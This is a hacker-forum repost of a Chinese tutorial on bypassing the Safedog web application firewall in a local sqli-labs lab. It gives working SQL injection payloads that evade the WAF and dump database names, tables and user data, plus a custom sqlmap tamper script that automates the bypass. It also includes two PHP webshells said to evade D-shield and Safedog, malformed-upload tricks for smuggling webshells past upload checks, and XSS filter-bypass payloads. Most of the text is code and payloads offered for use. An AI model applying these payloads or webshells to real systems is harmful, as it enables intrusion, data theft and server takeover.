跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

安全狗绕waf、编写sqlmap tamper脚本

HACK1949
HACK1949
问答中心

精选回复

发布于

安全狗绕waf、编写sqlmap tamper脚本

5fffa5fe0e211.png

原文来自SecIN社区—作者:gtfly

准备工作

安全狗官网:http://free.safedog.cn/install_desc_website.html

环境:Windows7+phpstudy+sqli-labs+安全狗v4.0

安装的时候最后让填系统服务,cd到phpstudy的apache2/bin目录,cmd执行:

httpd.exe -k install -n apache

然后服务名填写apache就行了

去github下载sqli-labs,修改sqli-labs/sql-connections/db-creds.inc为自己环境的数据库用户名和密码,然后切换phpstudy的php版本为5.2(sqli-labs需要php版本<5.5),修改php.ini:

magic_quotes_gpc = Off

准备工作完成

1606123049_5fbb7e29b1b03d9208d16.jpg!sma
1606123057_5fbb7e3136e165c44f06c.jpg!sma

绕SQL waf

1.注入判断

下面payload拦截:

-1'||1='1

下面payload不拦截:

-1'||-1='-1
-1'/*!14400or*/1=1%23

=替换成><likeregexp同样可以绕过

2.查询字段数

利用换行符+注释绕:

1'/**/order/*/%0a*a*/by/**/3%23

1606123070_5fbb7e3ecba23ec6ef5cf.jpg!sma

3.联合查询

同样利用换行符+注释绕,因为当union与select同时用的时候它才进行拦截:

-1'union/*/%0a*a*/select/**/1,2,3%23

1606123079_5fbb7e471fa70e34364a6.jpg!sma

4.查询所有数据库名:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(schema_name)from/**/information_schema.schemata)%23

查询当前数据库的表名时用到了database(),直接用的话会被拦截,这里用内联注释符将函数特征打乱:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=DatabaSe/*!(*/))%23

1606123108_5fbb7e64882b1c32a156c.jpg!sma

查询users表的字段名:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='users')%23

查数据:

-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(username)from/**/users)%23

编写sqlmap tamper脚本

直接使用sqlmap,它可以识别出安全狗waf、以及可以通过布尔盲注的方法跑数据(需要--random-agent参数):

1606123115_5fbb7e6baf23269a793a9.jpg!sma
1606123123_5fbb7e7324021ed73b1b2.jpg!sma

使用sqlmap的--list-tampers选项查看sqlmap自带的tamper脚本:

1606123131_5fbb7e7bdde852947d31f.jpg!sma

这些tamper脚本位于sqlmap-master/tamper/下,以lowercase.py为例,分析tamper脚本如何编写:

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re # 用于正则匹配

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL # 定义优先级,此处是‘一般’

def dependencies():
    pass

def tamper(payload, **kwargs): # 定义tamper脚本
    # tamper说明
    """
    Replaces each keyword character with lower case value (e.g. SELECT -> select)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions

    >>> tamper('INSERT')
    'insert'
    """

    retVal = payload # 将基本payload赋值给retVal,做中间转换

    if payload:
        for match in re.finditer(r"\b[A-Za-z_]+\b", retVal): # 查找字母
            word = match.group() # 将查找到的值赋值给word

            if word.upper() in kb.keywords: # 查找到的值是关键字
                retVal = retVal.replace(word, word.lower()) # 将关键字全部替换为小写

    return retVal # 返回替换后的值

那么复制上面的一份,改名为safedog.py,更改tamper()函数,自己编写进行关键字的替换:

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):

    retVal = payload

    if payload:
        retVal = retVal.replace('UNION', 'uNiOn/*/%0a*a*/')
        retVal = retVal.replace('DATABASE()', 'dataBase/*!(*/)')
        retVal = retVal.replace('USER()', 'usEr/*!(*/)')
        retVal = retVal.replace(' ', '/**/')
        retVal = retVal.replace('OR', '/*!14400Or*/')
        retVal = retVal.replace('AND', '/*!14400aNd*/')

    return retVal

再次测试:

./sqlmap.py -u 'http://10.211.55.5/sqli-labs/Less-1/?id=1' --flush-session --tamper=safedog --random-agent

1606123143_5fbb7e874c9fe9aaa757d.jpg!sma

这下便可以用sqlmap进行UNION注入了

绕WebShell waf

普通一句话直接被拦截:

1606123162_5fbb7e9a445d92e84b38c.jpg!sma

随便一个过D盾的马:

<?php
$b = &$a;
$a = $_POST[1];
$c = &$b;
eval(`/**test**/`.$c);
?>

1606123171_5fbb7ea38ec2ff67e9ffa.jpg!sma

直接进行命令执行,也是能过狗的:

<?php
System(/**/"$_GET[1]");
?>

1606123179_5fbb7eab68bc8615c4eef.jpg!sma

绕文件上传 waf

首先准备一个文件上传demo

upload.html:

<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
<form action="./upload.php" enctype="multipart/form-data"  multiple="" method="POST" >
    < input type="file" name="img[]" multiple>
    <button>提交</button>
</form>
</body>
</html>

upload.php:

<?php
echo '<pre>';
$img = $_FILES['img'];
if(!empty($img))
{
    $img_desc = reArrayFiles($img);
    #print_r($img_desc);
    foreach($img_desc as $val)
    {
        $newname = date('YmdHis',time()).mt_rand().'.'.$img["name"][0];
        move_uploaded_file($val['tmp_name'],'C:\phpstudy_pro\WWW\upload\\'.$newname);
        echo $newname;
    }
}

function reArrayFiles($file)
{
    $file_ary = array();
    $file_count = count($file['name']);
    $file_key = array_keys($file);

    for($i=0;$i<$file_count;$i++)
    {
        foreach($file_key as $val)
        {
            $file_ary[$i][$val] = $file[$val][$i];
        }
    }
    return $file_ary;
}
?>

直接上传一个webshell,发现被拦截:

1606123188_5fbb7eb4bf13c5bd96b38.jpg!sma

测试发现只对后缀名进行了检测;使用burp fuzz可用后缀:

1606123195_5fbb7ebbf265646109005.jpg!sma
由于是windows环境,服务器并不能将这些可用后缀当做php解析

绕过方法

主要利用畸形request包请求,apache处理request包的时候有容错,从而造成判断差异

1.通过filename处换行绕过:

1606123204_5fbb7ec4d11c775001116.jpg!sma
1606123213_5fbb7ecd12c440f15b3be.jpg!sma
2.filename用多=

1606123221_5fbb7ed555dfd4b777ca5.jpg!sma

3.用两个filename,第一个filename用=;

1606123228_5fbb7edc693d4f938935a.jpg!sma

4.文件名处填充垃圾字符(大约8k),这种情况需要后端更改上传的文件名,不然文件名太长move_uploaded_file会移动失败

5.利用.htaccess、.user.ini

绕XSS waf

以最简单的反射型xss为例,a.php写入:

<?php echo $_GET[1]; ?>

1606123236_5fbb7ee4a48190eff95d6.jpg!sma

fuzz了一下,下面这些会触发waf:

<script> 标签
<img 标签中含有 src=
<iframe 标签中含有 src="javascript:

直接用svg标签:

<svg/onload=alert(1)>

1606123243_5fbb7eeb9e5608081de94.jpg!sma

使用带on属性的标签,鼠标滑过时触发:

<h1 onmousemove="alert(1)">a</h1>

1606123251_5fbb7ef3bed4071145300.jpg!sma

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。